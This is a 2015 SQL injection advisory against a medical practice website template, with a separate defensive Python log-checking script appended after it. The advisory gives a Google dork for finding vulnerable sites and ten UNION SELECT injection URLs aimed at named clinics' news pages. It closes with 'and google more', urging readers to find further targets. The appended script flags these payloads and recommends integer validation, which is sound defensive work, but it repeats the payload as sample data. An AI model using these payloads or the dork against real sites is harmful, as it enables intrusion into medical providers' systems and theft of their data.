Medical Website Design SQL Injection Vulnerability

2015.07.26
Risk: Medium
Local: No
Remote: Yes
CVE: N/A
CWE: CWE-89

######################
# Exploit Title : Medical Website Design SQL Injection Vulnerability
# Exploit Author : Ashiyane Digital Security Team
# Vendor Homepage : http://www.medicalpracticewebsitedesign.com/
# Google Dork : "Medical Practice Website Design" inurl:.php?newsid=
# Date: 2015-07-24
# Tested On : Win 7 / Mozilla Firefox
#
######################
#
# demos and explanations :
#
# http://www.georgXiavascularclinic.com/news-topic.php?newsid=-25%20%20and+@x:=%28version%28%29%29+/*!00000union*/+SELECT+1,@x,3,4,5,6,7--
# http://www.arundXelpediatrics.net/news-topic.php?newsid=-28%20%20and+@x:=%28version%28%29%29+/*!00000union*/+SELECT+1,@x,3,4,5,6,7--
# http://www.monXtgomerywomenshealth.com/news-topic.php?newsid=-25%20and+@x:=%28version%28%29%29+/*!00000union*/+SELECT+1,@x,3,4,5,6,7--
# http://www.ovieXdointernalmedicine.com/news-topic.php?newsid=-29%20and+@x:=%28version%28%29%29+/*!00000union*/+SELECT+1,@x,3,4,5,6,7--
# http://personalizXedcardiology.com/news-topic.php?newsid=-27%20and+@x:=%28version%28%29%29+/*!00000union*/+SELECT+1,@x,3,4,5,6,7--
# http://www.norXthatlantaprimarycare.com/news-topic.php?newsid=-84%20and+@x:=%28version%28%29%29+/*!00000union*/+SELECT+1,@x,3,4,5,6--
# http://www.medXassocga.com/news-topic.php?newsid=-31%20and+@x:=%28version%28%29%29+/*!00000union*/+SELECT+1,@x,3,4,5,6,7--
# http://www.sd-Xneurosurgeon.com/news-topic.php?newsid=-16%20and+@x:=%28version%28%29%29+/*!00000union*/+SELECT+1,@x,3,4,5,6--
# http://www.sspXinst.us/news-topic.php?newsid=-25%20and+@x:=%28version%28%29%29+/*!00000union*/+SELECT+1,@x,3,4,5,6,7--
# http://www.nmmeXdicalgroup.com/news-topic.php?newsid=-13%20and+@x:=%28version%28%29%29+/*!00000union*/+SELECT+1,@x,3,4,5,6--
#
# and google more
#
######################
# discovered by : Naji
######################
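A defender-side check for the request pattern shown above, as an added example that is not part of the original advisory: it decodes the `newsid` parameter from a request target and reports why the value is not a plain integer id. The sample request lines, check names and function names are constructed for illustration.

```python
import re
from urllib.parse import urlsplit, parse_qs

# Constructed sample request targets, as they would appear in a web access log.
SAMPLE_REQUESTS = [
    "/news-topic.php?newsid=25",
    "/news-topic.php?newsid=-25%20and+@x:=%28version%28%29%29"
    "+/*!00000union*/+SELECT+1,@x,3,4,5,6,7--",
    "/news-topic.php?newsid=12%27",
    "/about.php?page=2",
]

# Markers taken from the request shape in the advisory, matched after URL decoding.
CHECKS = [
    ("versioned-comment", re.compile(r"/\*!\d*")),   # MySQL /*!NNNNN ... */ comment
    ("user-variable", re.compile(r"@\w+\s*:=")),     # @x:= assignment
    ("union-select", re.compile(r"union\b.*\bselect\b", re.I | re.S)),
    ("sql-comment-tail", re.compile(r"(--|#)\s*$")),
]

def inspect_newsid(request_target):
    """Return the reasons a newsid value is suspicious (empty list means clean)."""
    query = urlsplit(request_target).query
    # parse_qs percent-decodes the value and maps '+' to a space.
    values = parse_qs(query, keep_blank_values=True).get("newsid", [])
    reasons = []
    for value in values:
        # A news id should be an unsigned integer; anything else is already
        # enough to reject the request before it reaches the database layer.
        if not re.fullmatch(r"\d{1,10}", value):
            reasons.append("not-an-unsigned-integer")
        reasons.extend(name for name, rx in CHECKS if rx.search(value))
    return reasons

def flag_requests(request_targets):
    """Map each suspicious request target to its list of reasons."""
    flagged = {}
    for target in request_targets:
        reasons = inspect_newsid(target)
        if reasons:
            flagged[target] = reasons
    return flagged

if __name__ == "__main__":
    for target, reasons in flag_requests(SAMPLE_REQUESTS).items():
        print(", ".join(reasons), "<-", target)
```

The integer check is the part that belongs in the application itself, alongside a parameterized query for `newsid`; the pattern checks are only useful for triaging logs.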

